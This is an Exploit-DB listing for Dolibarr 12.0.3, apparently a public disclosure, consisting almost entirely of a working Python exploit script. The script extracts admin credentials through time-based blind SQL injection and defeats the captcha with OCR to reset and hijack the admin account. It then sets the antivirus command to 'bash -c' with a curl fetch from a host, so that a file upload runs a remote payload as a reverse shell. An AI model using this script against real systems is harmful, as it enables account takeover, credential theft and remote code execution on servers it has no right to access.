Dolibarr 12.0.3 - SQLi to RCE

EDB-ID:

49240

CVE:

N/A


Author:

coiffeur

Type:

webapps


Platform:

PHP

Date:

2020-12-11


# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3

import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp

import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image

DELTA = None
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80
DELAY = 1
LIKE = "%_subscription"
COLUMNS = ["login", "pass_temp"]


def usage():
    banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS=
SWORD>
EXAMPLE:
    python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12=
.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
    """
    print(banner)
    exit(-1)


def hex(text):
    return "0x" + binascii.hexlify(text.encode()).decode()


def hash(password):
    salt = bcrypt.gensalt()
    hashed = bcrypt.hashpw(password.encode(), salt)
    return hashed.decode()


def authenticate(url, username, password):
    datas = {
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": username,
        "password": password
    }
    r = SESSION.post(f"{url}index.php", data=datas,
                     allow_redirects=False, verify=False)
    if r.status_code != 302:
        if DEBUG:
            print(f"[x] Authentication failed!")
        return 0
    if DEBUG:
        print(f"    [*] Authenticated as: {username}")
    return 1


def get_antispam_code(base_url):
    code = ""
    while len(code) != 5:
        r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
        temp_image = f"/tmp/{random.randint(0000,9999)}"
        with open(temp_image, "wb") as f:
            f.write(r.content)
        with open(temp_image, "rb") as f:
            code = pytesseract.image_to_string(
                Image.open(BytesIO(f.read()))).split("\n")[0]
        for char in code:
            if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
                code = ""
                break
    return code


def reset_password(url, login):
    for _ in range(5):
        code = get_antispam_code(url)
        headers = {
            "Referer": f"{url}user/passwordforgotten.php"
        }
        datas = {
            "action": "buildnewpassword",
            "username": login,
            "code": code
        }
        r = SESSION.post(url=f"{url}user/passwordforgotten.php",
                         data=datas, headers=headers, verify=False)
        if r.status_code == 200:
            for response in [f"Request to change password for {login} sent =
to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]:
                if r.text.find(response):
                    if DEBUG:
                        print(f"    [*] Password reset using code: {code}")
                    return 1
    return 0


def change_password(url, login, pass_temp):
    r = requests.get(url=f"{url}user/passwordforgotten.php?action=val=
idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
                     allow_redirects=False, verify=False)
    if r.status_code == 302:
        if DEBUG:
            print(f"    [*] Password changed: {pass_temp}")
        return 1
    return 0


def change_binary(url, command, parameters):
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    datas = {
        "action": "updateform",
        "MAIN_UPLOAD_DOC": "2048",
        "MAIN_UMASK": "0664",
        "MAIN_ANTIVIRUS_COMMAND": command,
        "MAIN_ANTIVIRUS_PARAM": parameters
    }
    r = SESSION.post(url=f"{url}admin/security_file.php",
                     data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["Record modified successfully", "Enregistrement mo=
difi=C3=A9 avec succ=C3=A8s"]:
            if response in r.text:
                if DEBUG:
                    print(f"    [*] Binary's path changed")
                return 1
    return 0


def trigger_exploit(url):
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    files = {
        "userfile[]": open("junk.txt", "rb"),
    }
    datas = {
        "sendit": "Upload"
    }
    if DEBUG:
        print(f"    [*] Triggering reverse shell")
    r = SESSION.post(url=f"{url}admin/security_file.php",
                     files=files, data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["File(s) uploaded successfully", "The antivirus pr=
ogram was not able to validate the file (file might be infected by a virus)=
", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus=
 n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir=
us) !"]:
            if response in r.text:
                if DEBUG:
                    print(f"    [*] Exploit done")
                return 1
    return 0


def get_version(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(
        r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
    if x:
        version = x[0]
        if "12.0.3" in version:
            if DEBUG:
                print(f"    [*] {version} (exploit should work)")
            return 1
    if DEBUG:
        print(f"[*] Version may not be vulnerable")
    return 0


def get_privileges(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(r"id=\d", r.text)
    if x:
        id = x[0]
        if DEBUG:
            print(f"    [*] id found: {id}")
        r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
        soup = BeautifulSoup(r.text, 'html.parser')
        for img in soup.find_all("img"):
            if img.get("title") in ["Actif", "Active"]:
                for td in img.parent.parent.find_all("td"):
                    privileges = [
                        "Consulter les commandes clients", "Read customers =
orders"]
                    for privilege in privileges:
                        if privilege in td:
                            if DEBUG:
                                print(
                                    f"    [*] Check privileges: {privilege}=
")
                            return 1
    if DEBUG:
        print(f"[*] At the sight of the privileges, the exploit may fail")
    return 0


def check(url, payload):
    headers = {
        "Referer": f"{url}commande/stats/index.php?leftmenu=orders"
    }
    datas = {"object_status": payload}
    r = SESSION.post(url=f"{url}commande/stats/index.php",
                     data=datas, headers=headers, verify=False)
    return r.elapsed.total_seconds()


def evaluate_delay(url):
    global DELTA
    deltas = []
    payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    for _ in range(4):
        deltas.append(check(url, payload))
    DELTA = sum(deltas)/len(deltas)
    if DEBUG:
        print(f"    [+] Delta: {DELTA}")


def get_tbl_name_len(url):
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH(table_name) FROM information_schema=
.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_tbl_name(url, length):
    tbl_name = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i=
nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP=
({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        tbl_name += chr(min)
    return tbl_name


def get_elt_len(url, tbl_name, column_name):
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI=
T 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_elt(url, tbl_name, column_name, length):
    elt = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO=
M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        elt += chr(min)
    return elt


def get_row(url, tbl_name):
    print(f"    [*] Dump admin's infos from {tbl_name}")
    infos = {}
    for column_name in COLUMNS:
        elt_length = get_elt_len(url, tbl_name, column_name)
        infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng=
th)
    if DEBUG:
        print(f"    [+] Infos: {infos}")
    return infos


def main(url, username, password):
    # Check if exploit is possible
    print(f"[*] Requirements:")
    if not authenticate(url, username, password):
        print(f"[x] Exploit failed!")
        exit(-1)
    get_version(url)
    get_privileges(url)

    print(f"\n[*] Starting exploit:")
    # Evaluate delay
    evaluate_delay(url)
    print(f"    [*] Extract prefix (using table: {LIKE})")
    tbl_name_len = get_tbl_name_len(url)
    tbl_name = get_tbl_name(url, tbl_name_len)
    prefix = f"{tbl_name.split('_')[0]}_"
    if DEBUG:
        print(f"    [+] Prefix: {prefix}")

    # Dump admin's infos
    user_table_name = f"{prefix}user"
    infos = get_row(url, user_table_name)
    if not infos["login"]:
        print(f"[x] Exploit failed!")
        exit(-1)

    # Reset admin's passworrd
    if DEBUG:
        print(f"    [*] Reseting {infos['login']}'s password")
    if not reset_password(url, infos["login"]):
        print(f"[x] Exploit failed!")
        exit(-1)
    infos = get_row(url, user_table_name)

    # Remove cookies to logout
    # Change admin's password
    # Login as admin
    SESSION.cookies.clear()
    if not change_password(url, infos['login'], infos['pass_temp']):
        print(f"[x] Exploit failed!")
        exit(-1)
    authenticate(url, infos['login'], infos['pass_temp'])

    # Change antivirus's binary path
    # Trigger reverse shell
    change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'=
)
    trigger_exploit(url)
    return 0


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", help="Base URL of Dolibarr")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()

    if not args.t or not args.u or not args.p:
        usage()

    main(args.t, args.u, args.p)